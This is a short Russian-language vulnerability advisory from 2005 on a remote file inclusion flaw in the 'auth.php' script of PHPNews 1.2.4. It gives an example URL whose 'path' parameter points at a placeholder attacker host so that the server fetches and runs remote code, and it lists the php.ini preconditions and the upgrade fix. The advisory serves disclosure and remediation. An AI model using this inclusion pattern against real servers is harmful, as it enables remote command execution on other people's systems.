PHP-инклюдинг в PHPNews

Дата публикации:
11.03.2005
Всего просмотров:
914
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHPNews 1.x
Уязвимые версии: PHPNews 1.2.4

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует в сценарии 'auth.php' из-за некорректной обработки входных данных в некоторых переменных. Злоумышленник может с помощью специально сформированного URL выполнить произвольные команды на уязвимой системе с привилегиями web сервера. Пример:

http://[target]/[dir]/auth.php?path=http://[attacker]/

Примечание: Для удачной эксплуатации уязвимости register_globals и allow_url_fopen должны быть включены в конфигурационном файле php.ini.

URL производителя: http://newsphp.sourceforge.net

Решение: Установите последнюю версию от производителя.
http://newsphp.sourceforge.net/downloads.php

Ссылки: PHPNews 'auth.php' Include File Flaw Lets Remote Users Execute Arbitrary Code

или введите имя

CAPTCHA